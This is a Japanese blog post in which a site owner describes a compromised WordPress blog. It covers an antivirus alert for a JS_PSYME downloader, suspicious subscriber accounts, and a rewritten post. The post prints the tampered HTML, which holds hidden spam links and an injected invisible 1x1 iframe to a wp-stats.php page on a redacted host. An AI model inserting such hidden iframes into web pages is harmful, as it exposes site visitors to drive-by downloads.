wordpressを設置して1年。
放置しっぱなしのドメインがあって、そういえば明日で期限が切れるとおもって見に行った。
ウイルスバスターが反応した。
警告
ウイルスが見つかりました
ファイル名 wp-stats[1].htm
JS_PSYME.XP
概 要 対応方法 感染状況
参 照
別 名: Downloader (Symantec), TR/Dldr.HTML.Agent.IS (Avira),
感染報告の有無 : なし
言語: English
危険度: 低
感染報告: 低
ダメージ度: 低
感染力: 低
特 徴: Worm generic description
ざっと管理画面からどこか改変されてないかみてみたが見当たらなかった。
プラグインのせいだろうか?
いやそもそもこのSymantecの文字が気になる。
気になる事があるとすれば、
購読者 - (Subscriber)が7名いること。
ユーザー登録してなんになるんだろう。
runPHP狙いだろうか。Subscriberには権限を与えていないので意味がないはずだとおもう。
コメント投稿狙いだろうか。
Akismetがんばったね!!
ま、明日さくっと消しておこう。。。
わかった。記事の内容が書き換えられていた。
書き換えられていた記事は最後の書き込み。
ニコニコ動画のiframeの本来のタグを無効化して違うところを参照するifreameを書いてござった。
<iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe> <iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe>
これが
<iframe width="312" height="176" <noscript>XXXX(なんかスペイン語っぽい言葉) <a href="XXXXX">XXXXXXXX</a> XXXXXX</noscript> src="<a href="http://www.nicovideo.jp/thumb/XXXXX">http://www.nicovideo.jp/thumb/XXXXX</a>" scrolling="no" <noscript> XXXXXXXX(上と違う内容) <a href="XXXXXXX">XXXXXXX</a> XXXXXXXX </noscript> style="border:solid 1px #CCC;" frameborder="0"><a href=" <a href="http://www.nicovideo.jp/watch/XXXXXX"> http://www.nicovideo.jp/watch/XXXXXX</a> ">【ニコニコ動画】XXXXXX(1/2)</a></iframe> <p><iframe width="312" height="176" src=" <a href="http://www.nicovideo.jp/thumb/XXXX">http://www.nicovideo.jp/thumb/XXXXXX</a> "<!-- Traffic Statistics --> <iframe src=XXXXXXXX/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="<a href="http://www.nicovideo.jp/watch/XXXX">http://www.nicovideo.jp/watch/XXXX</a> ">【ニコニコ動画】XXXXXXXX(2/2)</a></iframe>
なにがしたいのかわからないが、
なんかもしかしたら3回ぐらい同じ系統で書き換えられてるのかもしれない。
やりかたはさっぱり想像できない。
でも、ここまで記事の内容が差し替えられるのだとしたら、管理者アカウントをのっとっちゃうのが一番てっとりばやいかな。
で、新しく記事が投稿されたのか監視するために購読者登録っと。
そんなところじゃないだろうか。。。